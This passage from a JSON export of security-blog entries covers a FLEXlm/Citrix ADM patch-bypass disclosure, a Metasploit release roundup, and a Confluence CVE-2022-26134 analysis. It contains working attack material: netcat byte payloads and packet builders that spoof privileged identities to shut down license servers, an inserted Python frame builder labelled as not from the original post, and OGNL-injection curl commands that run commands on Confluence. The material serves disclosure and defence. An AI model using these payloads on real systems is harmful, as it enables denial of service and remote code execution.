"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-21T00:06:00", "description": "\n\n_**Note:** Updated October 20, 2022 to clarify that this bypasses CVE-2022-27512 and not CVE-2022-27511, which has a different root cause._\n\nOn June 27, 2022, 
Citrix released [an advisory](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>) for [CVE-2022-27511](<https://nvd.nist.gov/vuln/detail/CVE-2022-27511>) and [CVE-2022-27512](<https://nvd.nist.gov/vuln/detail/CVE-2022-27512>), which affect Citrix ADM (Application Delivery Management).\n\nRapid7 [investigated these issues](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>) to better understand their impact, and found that the patch is not sufficient to prevent exploitation. We also determined that the worst outcome of this vulnerability is a denial of service - the licensing server can be told to shut down (even with the patch). We were not able to find a way to reset the admin password, as the original bulletin indicated.\n\nIn the course of investigating CVE-2022-27511 and CVE-2022-27512, we determined that the root cause of the issues in Citrix ADM was a vulnerable implementation of [popular licensing software FLEXlm](<https://en.wikipedia.org/wiki/FlexNet_Publisher>), also known as FlexNet Publisher. This disclosure addresses both the core issue in FLEXlm and Citrix ADM\u2019s implementation of it (which resulted in both the original CVEs and later the patch bypass our research team discovered). Rapid7 coordinated disclosure with both companies and [CERT/CC](<https://cert.org>).\n\nAs of this publication, these issues remain unpatched, so IT defenders are urged to reach out to [Revenera](<mailto:psirt-cna@flexerasoftware.com>) and [Citrix](<mailto:secure@citrix.com>) for direct guidance on mitigating these denial of service vulnerabilities and CVE assignment.\n\n## Products\n\nFLEXlm is a license management application that is part of FlexNet licensing, provided by Revenera's Flexnet Software, and is used for license provisioning on many popular network applications, including Citrix ADM. 
You can read more about FlexNet at [the vendor's website](<https://www.revenera.com/software-monetization/products/software-licensing/flexnet-licensing>).\n\nCitrix ADM is an application provisioning solution from Citrix, which uses FLEXlm for license management. You can read more about Citrix ADM at [the vendor's website](<https://docs.citrix.com/en-us/citrix-application-delivery-management-service/overview.html>).\n\n## Discoverer\n\nThis issue was discovered by [Ron Bowes](<https://twitter.com/iagox86>) of Rapid7 while researching [CVE-2022-27511](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>) and CVE-2022-27512 in Citrix ADM. It is being disclosed in accordance with Rapid7\u2019s [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Exploitation\n\nCitrix ADM runs on FreeBSD, and remote administrative logins are possible. Using that, we compared two different versions of the Citrix ADM server - before and after the patch.\n\nEventually, we went through each network service, one by one, to check what each one did and whether the patch may have fixed something. When we got to TCP port 27000, we found that `lmgrd` was running. Looking up `lmgrd`, we determined that it's a [licensing server made by FLEXlm](<https://www.openlm.com/what-is-the-difference-between-the-flexlm-lmgrd-and-lmadmin-license-server-managers/>) called [FlexNet Licensing](<https://www.revenera.com/software-monetization/products/software-licensing/flexnet-licensing>) (among other names), made by Revenera. Since the bulletin calls out licensing disruption, this seemed like a sensible place to look; from the bulletin:\n\n> Temporary disruption of the ADM license service. 
The impact of this includes preventing new licenses from being issued or renewed by Citrix ADM.\n\nIf we look at how `lmgrd` is executed before and after the patch, we find that the command line arguments changed; before:\n \n \n bash-3.2# ps aux | grep lmgrd\n root 3506 0.0 0.0 10176 6408 - S 19:22 0:09.67 /netscaler/lmgrd -l /var/log/license.log -c /mpsconfig/license\n \n\nAnd after:\n \n \n bash-3.2# ps aux | grep lmgrd\n root 5493 0.0 0.0 10176 5572 - S 13:15 0:02.45 /netscaler/lmgrd -2 -p -local -l /var/log/license.log -c /mpsconfig/license\n \n\nIf we look at some [online documentation](<https://cs.uwaterloo.ca/~echrzano/all#6.4>), we see that the `-2 -p` flags are security-related:\n \n \n -2 -p Restricts usage of lmdown, lmreread, and lmremove to a FLEXlm administrator who is by default root. [...]\n \n\n### Patch Analysis\n\nWe tested a Linux copy of FlexNet 11.18.3.1, which allowed us to execute and debug Flex locally. Helpfully, the various command line utilities that FlexNet uses to perform actions (accessible via `lmutil`) use a TCP connection to `localhost`, allowing us to analyze the traffic. For example, the following command:\n \n \n $ ./lmutil lmreread -c ./license/citrix_startup.lic\n lmutil - Copyright (c) 1989-2021 Flexera. All Rights Reserved.\n lmreread successful\n \n\nGenerates a lot of traffic going to `localhost:27000`, including:\n \n \n Sent:\n \n 00000000 2f 4c 0f b0 00 40 01 02 63 05 2c 85 00 00 00 00 /L...@.. c.,.....\n 00000010 00 00 00 02 01 04 0b 12 00 54 00 78 00 02 0b af ........ .T.x....\n 00000020 72 6f 6e 00 66 65 64 6f 72 61 00 2f 64 65 76 2f ron.fedo ra./dev/\n 00000030 70 74 73 2f 32 00 00 78 36 34 5f 6c 73 62 00 01 pts/2..x 64_lsb..\n \n Received:\n \n 00000000 2f 8f 09 c6 00 26 01 0e 63 05 2c 85 41 00 00 00 /....&.. c.,.A...\n 00000010 00 00 00 02 0b 12 01 04 00 66 65 64 6f 72 61 00 ........ .fedora.\n 00000020 6c 6d 67 72 64 00 lmgrd.\n \n Sent:\n \n 00000040 2f 23 34 78 00 24 01 07 63 05 2c 86 00 00 00 00 /#4x.$.. 
c.,.....\n 00000050 00 00 00 02 72 6f 6e 00 66 65 64 6f 72 61 00 00 ....ron. fedora..\n 00000060 92 00 00 0a ....\n \n Received:\n \n 00000026 2f 54 18 b9 00 a8 00 4f 63 05 2c 86 41 00 00 00 /T.....O c.,.A...\n 00000036 00 00 00 02 4f 4f 00 00 00 00 00 00 00 00 00 00 ....OO.. ........\n 00000046 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 00000056 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 00000066 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 00000076 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 00000086 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 00000096 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 000000A6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 000000B6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........\n 000000C6 00 00 00 00 00 00 00 00 ........ \n \n\nIf we start the service with the `-2 -p` flag, we can no longer run `lmreread`:\n \n \n $ ./lmutil lmreread -c ./license/citrix_startup.lic\n lmutil - Copyright (c) 1989-2021 Flexera. All Rights Reserved.\n lmreread failed: You are not a license administrator. (-63,294)\n \n\nThat appears to be working as intended! Or does it?\n\n### Protocol Analysis\n\nWe spent a substantial amount of time reverse engineering FlexNet's protocol. FlexNet uses a binary protocol with a lot of support and code paths for different (and deprecated) versions of the protocol. But we built a tool (that you can get [on GitHub](<https://github.com/rbowes-r7/doltool>)) that implements the interesting parts of the protocol.\n\nIt turns out, even ignoring the vulnerability, you can do a whole bunch of stuff against the FlexNet service, and none of it even requires authentication! 
For example, you can grab the path to the license file:\n \n \n $ echo -ne \"\\x2f\\xa9\\x21\\x3a\\x00\\x3f\\x01\\x08\\x41\\x41\\x41\\x41\\x42\\x42\\x42\\x42\\x43\\x00\\x44\\x44\\x01\\x04\\x72\\x6f\\x6f\\x74\\x00\\x43\\x69\\x74\\x72\\x69\\x78\\x41\\x44\\x4d\\x00\\x6c\\x6d\\x67\\x72\\x64\\x00\\x2f\\x64\\x65\\x76\\x2f\\x70\\x74\\x73\\x2f\\x31\\x00\\x67\\x65\\x74\\x70\\x61\\x74\\x68\\x73\\x00\" | nc 10.0.0.9 27000\n LW37/mpsconfig/license/citrix_startup.lic\n \n\nYou can even grab the whole license file:\n \n \n $ echo -ne \"\\x2f\\x8a\\x17\\x2d\\x00\\x37\\x01\\x08\\x41\\x41\\x41\\x41\\x42\\x42\\x42\\x42\\x43\\x00\\x44\\x44\\x01\\x04\\x72\\x6f\\x6f\\x74\\x00\\x43\\x69\\x74\\x72\\x69\\x78\\x41\\x44\\x4d\\x00\\x6c\\x6d\\x67\\x72\\x64\\x00\\x2f\\x64\\x65\\x76\\x2f\\x70\\x74\\x73\\x2f\\x31\\x00\\x00\" | nc -v 10.0.0.9 27000\n Ncat: Version 7.92 ( https://nmap.org/ncat )\n Ncat: Connected to 10.0.0.9:27000.\n L6194# DO NOT REMOVE THIS COMMENT LINE\n # \"\u306e\u30b3\u30e1\u30f3\u30c8\u884c\u306f\u524a\u9664\u3057LK6060NEN\n # NE SUPPRIMEZ PAS CETTE LIGNE DE COMMENTAIRE\n # NO ELIMINAR ESTA L\u00cdNL5926IX PORT=7279\n \n\nAnd you can also remotely re-load the license file and shut down the service if the `-p -2` flag is not set when the server starts. 
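As an added worked example (not code from this post or from the doltool repository), the following Python decodes and re-encodes the frame layout that is visible in the captures above: a 0x2f magic byte, a big-endian total length, a big-endian message type, and NUL-terminated identity strings that the client fills in for itself. The three bytes after the magic and the twelve bytes before the body are left undecoded because the page does not decode them (the defaults used when building a frame are simply the values the hand-built `echo` frames above use, and it is an assumption that lmgrd accepts them). The names `MSG_LOGIN`, `MSG_QUERY` and `MSG_LMDOWN` and all function names are this example's own labels, not FlexNet's; the lmdown body reproduces the `flexnet-tools.rb` excerpt in the Patch Bypass section further down, including its `islocalSys` marker. Nothing is sent over the network; the sample frames are constructed from the bytes printed on this page.

```python
import struct

# Added example: decoder/encoder for the lmgrd (TCP/27000) frame layout seen on this page.
# Not code from the post or from doltool.
#
# Frame layout as observed in the page's captures:
#   byte 0       0x2f magic
#   bytes 1-3    three bytes the page does not decode (they differ from frame to frame)
#   bytes 4-5    big-endian total frame length, header included (0x3f for the getpaths frame)
#   bytes 6-7    big-endian message type (0x0102 login, 0x0108 getpaths, 0x010a lmdown)
#   bytes 8-19   twelve bytes the page does not decode; the hand-built frames fill them
#                with "AAAABBBBC\x00DD"
#   bytes 20-    message body; the identity fields are NUL-terminated strings
FLEX_MAGIC = 0x2F
HEADER_LEN = 8
UNDECODED_LEN = 12

# Message types seen on the page. These names are this example's labels, not FlexNet's.
MSG_LOGIN = 0x0102   # the lmutil "authentication" message
MSG_QUERY = 0x0108   # the page's getpaths / license-file frames
MSG_LMDOWN = 0x010A  # the lmdown message from flexnet-tools.rb

# Constructed from the page's own bytes: the frame that returns the license file path.
GETPATHS_FRAME = (b"\x2f\xa9\x21\x3a\x00\x3f\x01\x08" + b"AAAABBBBC\x00DD"
                  + b"\x01\x04root\x00CitrixADM\x00lmgrd\x00/dev/pts/1\x00getpaths\x00")

# Constructed from the page's hex dump of lmutil logging in as ron@fedora (64 bytes).
LMUTIL_LOGIN_FRAME = (b"\x2f\x4c\x0f\xb0\x00\x40\x01\x02"
                      + b"\x63\x05\x2c\x85\x00\x00\x00\x00\x00\x00\x00\x02"
                      + b"\x01\x04\x0b\x12\x00\x54\x00\x78\x00\x02\x0b\xaf"
                      + b"ron\x00fedora\x00/dev/pts/2\x00\x00x64_lsb\x00\x01")


def split_cstrings(buf):
    """Split NUL-terminated strings; bytes after the final NUL are returned as the trailer."""
    *fields, trailer = buf.split(b"\x00")
    return [f.decode("latin-1") for f in fields], trailer


def build_frame(msg_type, body, hdr_bytes=b"\xa9\x21\x3a", prefix=b"AAAABBBBC\x00DD"):
    """Wrap a body in the frame layout above.

    hdr_bytes and prefix default to what the page's hand-built frames use; this example
    does not know whether lmgrd validates them (assumption: it accepts these values)."""
    if len(hdr_bytes) != 3 or len(prefix) != UNDECODED_LEN:
        raise ValueError("header filler has the wrong size")
    length = HEADER_LEN + UNDECODED_LEN + len(body)
    return bytes([FLEX_MAGIC]) + hdr_bytes + struct.pack(">HH", length, msg_type) + prefix + body


def lmdown_body(user, host, islocalsys):
    """The lmdown body from the flexnet-tools.rb excerpt: a "forced" byte, user and host
    (both only logged, never verified), a fixed word, then the optional islocalSys marker."""
    marker = b"islocalSys" if islocalsys else b""
    return (b"\x00" + user.encode() + b"\x00" + host.encode() + b"\x00" + b"\x00"
            + b"\x01\x00\x00\x7f" + b"\x00" + marker + b"\x00")


def parse_frame(data):
    """Decode one frame into a dict, pulling out every field the client chose for itself."""
    if len(data) < HEADER_LEN + UNDECODED_LEN or data[0] != FLEX_MAGIC:
        raise ValueError("not a FlexNet frame")
    length, msg_type = struct.unpack(">HH", data[4:8])
    if length != len(data):
        raise ValueError(f"length field says {length} bytes, got {len(data)}")
    body = data[HEADER_LEN + UNDECODED_LEN:]
    frame = {"type": msg_type, "length": length,
             "prefix": data[HEADER_LEN:HEADER_LEN + UNDECODED_LEN]}
    if msg_type == MSG_LOGIN:
        # flag pair, version pair, two uint16s, one uint32, then user, host, tty, "", platform
        flags, version, _w1, _w2, _dword = struct.unpack(">2s2sHHI", body[:12])
        strings, trailer = split_cstrings(body[12:])
        frame.update(login_flag=flags[1], version=version, user=strings[0], host=strings[1],
                     tty=strings[2], platform=strings[4], trailer=trailer)
    elif msg_type == MSG_LMDOWN:
        strings, _ = split_cstrings(body[1:])        # body[0] is the "forced?" byte
        frame.update(user=strings[0], host=strings[1], claims_localsys=b"islocalSys" in body)
    else:
        strings, trailer = split_cstrings(body[2:])  # skip the leading "\x01\x04"
        frame.update(user=strings[0], host=strings[1], strings=strings, trailer=trailer)
    return frame


def privilege_claims(frame):
    """The two client-asserted values the page identifies as gating privileged actions:
    the non-zero login flag byte and the islocalSys marker. Neither is backed by a secret."""
    return {"login_flag_set": frame.get("login_flag", 0) != 0,
            "claims_localsys": frame.get("claims_localsys", False)}


if __name__ == "__main__":
    samples = [("getpaths", GETPATHS_FRAME), ("lmutil login", LMUTIL_LOGIN_FRAME),
               ("lmdown", build_frame(MSG_LMDOWN, lmdown_body("root", "CitrixADM", True)))]
    for name, raw in samples:
        parsed = parse_frame(raw)
        print(f"{name:13} type=0x{parsed['type']:04x} len={parsed['length']:2d} "
              f"user={parsed['user']} host={parsed['host']} {privilege_claims(parsed)}")
```

Running it decodes the `getpaths` frame from the `echo` command above back into `root@CitrixADM`, decodes the lmutil capture into `ron@fedora` with the login flag byte set to 4, and shows that the only thing separating an ordinary `lmdown` from one that passes the `-2 -p` check is a client-supplied string. Feeding the decoder a length field that does not match the bytes received is rejected, which is the one check the layout itself affords.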
That's the core of the original CVEs - that those flags aren't used and therefore a remote user can take administrative actions.\n\n### Patch Bypass\n\nThe problem is, all of the security features (including declaring your username and privilege level) are client-side choices, which means that without knowing any secret information, the client can self-declare that they are privileged.\n\nThis is what the \"authentication\" message looks like in `flexnet-tools.rb`:\n \n \n send_packet(0x2f, 0x0102,\n \"\\x01\\x04\" + # If the `\\x04` value here is non-zero, we are permitted to log in\n \"\\x0b\\x10\" + # Read as a pair of uint16s\n \"\\x00\\x54\" + # Read as single uint16\n \"\\x00\\x78\" + # Read as single uint16\n \"\\x00\\x00\\x16\\x97\" + # Read as uint32\n \"root\\x00\" +\n \"CitrixADM\\x00\" +\n \"/dev/pts/1\\x00\" +\n \"\\x00\" + # If I add a string here, the response changes\n \"x86_f8\\x00\" +\n \"\\x01\"\n )\n \n\nIn that example, `root` is the username, and `CitrixADM` is the host. Those can be set to whatever the client chooses, and permissions and logs will reflect that. The first field, `\\x01\\x04`, is also part of the authentication process, where the `\\x04` value specifically enables remote authorization - while we found the part of the binary that reads that value, we are not clear what the actual purpose is.\n\nDeclaring oneself as `root@CitrixADM` in that message bypasses the need to actually authenticate. The `lmdown` message, which shuts down the licensing server, has an additional required field:\n \n \n when 'lmdown'\n out = send_packet(0x2f, 0x010a,\n \"\\x00\" + # Forced?\n \"root\\x00\" + # This is used in a log message\n \"CitrixADM\\x00\" +\n \"\\x00\" +\n \"\\x01\\x00\\x00\\x7f\" +\n \"\\x00\" +\n (LOGIN ? 
\"islocalSys\" : \"\") + # Only attach islocalSys if we're logging in\n \"\\x00\"\n )\n \n\nThe `islocalSys` value self-identifies the client as privileged, and therefore it is allowed to bypass the `-2 -p` flags and perform restricted actions. This bypasses the patch.\n\n## Impact\n\nRemotely shutting down the FLEXlm licensing server can cause a denial of service condition in the software for which that licensing server is responsible. In this particular case, exploiting this vulnerability can cause a disruption in provisioning licenses through Citrix ADM.\n\n## Remediation\n\nIn the absence of a vendor-supplied patch, users of software that relies on FLEXlm should not expose port 27000/TCP to untrusted networks. Note that in many cases, this would remove the functionality of the license server entirely.\n\n## Disclosure Timeline\n\nThis issue was disclosed in accordance with Rapid7's [vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/#zeroday>), but with a slightly faster initial release to CERT/CC, due to the multivendor nature of the issue.\n\n * June, 2022: Issues discovered and documented by Rapid7 researcher [Ron Bowes](<https://twitter.com/iagox86>)\n * Tue, Jul 5, 2022: Disclosed to Citrix via their PSIRT team\n * Thu, Jul 7, 2022: Disclosed to Flexera via their PSIRT team\n * Wed, Jul 12, 2022: Disclosed to CERT/CC (VU#300762)\n * July - October, 2022: Disclosure discussions between Rapid7, Citrix, Flexera, and CERT/CC through [VINCE](<https://www.kb.cert.org/vince/>) (Case 603).\n * Fri, Oct 14, 2022: Revenera publishes [advisory](<https://community.flexera.com/t5/FlexNet-Publisher-Knowledge-Base/Elevated-Privilege-issue-discovered-in-FlexNet-Publisher-License/ta-p/252331/jump-to/first-unread-message>) indicating FlexNet Publisher 2022 R3 (11.19.2.0) contains a fix for the FlexLM issue.\n * Tue, Oct 18, 2022: This public disclosure\n\n## Rapid7 Customers\n\nThe October 18 content release for InsightVM and Nexpose contains a remote 
vulnerability check based on the version returned by a running FLEXlm license server, as well as an authenticated check based on the installed version of Citrix ADM. Please note that these checks require the Scan Engine and are not supported via the Insight Agent.\n\n_Update: On October 20, Rapid7 learned that Revenera published an advisory on October 14._", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-18T13:30:00", "type": "rapid7blog", "title": "FLEXlm and Citrix ADM Denial of Service Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27511", "CVE-2022-27512"], "modified": "2022-10-18T13:30:00", "id": "RAPID7BLOG:B6316C65DCD455AD37755DD4C29C655A", "href": "https://blog.rapid7.com/2022/10/18/flexlm-and-citrix-adm-denial-of-service-vulnerability/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:N"}}, {"lastseen": "2022-06-14T17:04:53", "description": "## A Confluence of High-Profile Modules\n\n\n\nThis release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the 
Windows Operating System accessible through malicious documents. Both have been all over the news, and we\u2019re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you\u2019d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 ([AttackerKB](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>)) and Windows CVE-2022-30190 ([AttackerKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>)).\n\n## Metasploit 6.2\n\nWhile we release new content weekly (or in real-time if you are using GitHub), we track milestones as well. This week, we released Metasploit 6.2, and it has a whole host of [new functionality, exploits, and fixes](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>).\n\n## New module content (2)\n\n * [Atlassian Confluence Namespace OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/16644>) by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits [CVE-2022-26134](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>) \\- This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). 
A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n * [Microsoft Office Word MSDTJS](<https://github.com/rapid7/metasploit-framework/pull/16635>) by mekhalleh (RAMELLA S\u00e9bastien) and nao sec, which exploits [CVE-2022-30190](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190?referrer=blog>) \\- This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.\n\n## Enhancements and features (2)\n\n * [#16651](<https://github.com/rapid7/metasploit-framework/pull/16651>) from [red0xff](<https://github.com/red0xff>) \\- The `test_vulnerable` methods in the various SQL injection libraries have been updated so that they now use the encoder, if one is specified, ensuring that characters are appropriately encoded as needed.\n * [#16661](<https://github.com/rapid7/metasploit-framework/pull/16661>) from [dismantl](<https://github.com/dismantl>) \\- The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.\n\n## Bugs fixed (4)\n\n * [#16615](<https://github.com/rapid7/metasploit-framework/pull/16615>) from [NikitaKovaljov](<https://github.com/NikitaKovaljov>) \\- A bug has been fixed in the IPv6 library when creating solicited-node multicast addresses: leading zeros in the last 16 bits of the link-local address are now found and removed.\n * [#16630](<https://github.com/rapid7/metasploit-framework/pull/16630>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `auxiliary/server/capture/smb` module no longer stores duplicate Net-NTLM hashes in the database.\n * [#16643](<https://github.com/rapid7/metasploit-framework/pull/16643>) from [ojasookert](<https://github.com/ojasookert>) \\- The `exploits/multi/http/php_fpm_rce` module has been updated to be compatible with Ruby 3.0 changes.\n * [#16653](<https://github.com/rapid7/metasploit-framework/pull/16653>) from 
[adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-06-02T11%3A20%3A37-04%3A00..2022-06-09T09%3A41%3A47-05%3A00%22>)\n * [Full diff 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/compare/6.2.1...6.2.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:05", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-06-10T18:07:05", "id": "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "href": "https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T01:56:25", "description": "\n\nOn June 2, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability was unpatched when it was published on June 2. As of June 3, both patches and a temporary workaround are available.\n\nCVE-2022-26134 is being actively and widely [exploited in the wild](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). Rapid7's Managed Detection and Response (MDR) team has observed an uptick of likely exploitation of CVE-2022-26134 in customer environments as of June 3.\n\nAll supported versions of Confluence Server and Data Center are affected. \nAtlassian updated their advisory on June 3 to reflect that it's likely that **all versions** (whether supported or not) of Confluence Server and Data Center are affected, but they have yet to confirm the earliest affected version. Organizations should install patches OR apply the workaround on an **emergency basis**. 
If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately.\n\n## Technical analysis\n\nCVE-2022-26134 is an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server (typically the `confluence` user on Linux installations). Given the nature of the vulnerability, [internet-facing](<https://www.shodan.io/search?query=X-Confluence-Request-Time>) Confluence servers are at very high risk.\n\nLast year, Atlassian Confluence suffered from a different unauthenticated and remote OGNL injection, [CVE-2021-26084](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>). Organizations maintaining an internet-facing Confluence Server or Data Center instance may want to consider permanently moving access behind a VPN.\n\n### The vulnerability\n\nAs stated, the vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc.) or invalid (e.g. \u201cBALH\u201d). In its simplest form, an exploit abusing the vulnerability looks like this:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/\n \n\nAbove, the exploit is URL-encoded. The exploit encompasses everything from the start of the content location to the last instance of `/`. Decoded, it looks like this:\n \n \n ${@java.lang.Runtime@getRuntime().exec(\"touch /tmp/r7\")}\n \n\nEvidence of exploitation can typically be found in access logs because the exploit is stored in the HTTP request field. 
For example, on our test Confluence (version 7.13.6 LTS), the log file `/opt/atlassian/confluence/logs/conf_access_log.<yyyy-mm-dd>.log` contains the following entry after exploitation:\n \n \n [02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0\n \n\nScanning for vulnerable servers is easy because exploitation allows attackers to force the server to send command output in the HTTP response. For example, the following request will return the response of `whoami` in the attacker-created `X-Cmd-Response` HTTP field (credit to Rapid7\u2019s Brandon Turner for the exploit below). Note the `X-Cmd-Response: confluence` line in the HTTP response:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\n * Trying 10.0.0.28:8090...\n * TCP_NODELAY set\n * Connected to 10.0.0.28 (10.0.0.28) port 8090 (#0)\n > GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n > Host: 10.0.0.28:8090\n > User-Agent: curl/7.68.0\n > Accept: */*\n > \n * Mark bundle as not supporting multiuse\n < HTTP/1.1 302 \n < Cache-Control: no-store\n < Expires: Thu, 01 Jan 1970 00:00:00 GMT\n < X-Confluence-Request-Time: 1654212503090\n < Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly\n < X-XSS-Protection: 1; mode=block\n < X-Content-Type-Options: nosniff\n < X-Frame-Options: SAMEORIGIN\n < Content-Security-Policy: frame-ancestors 
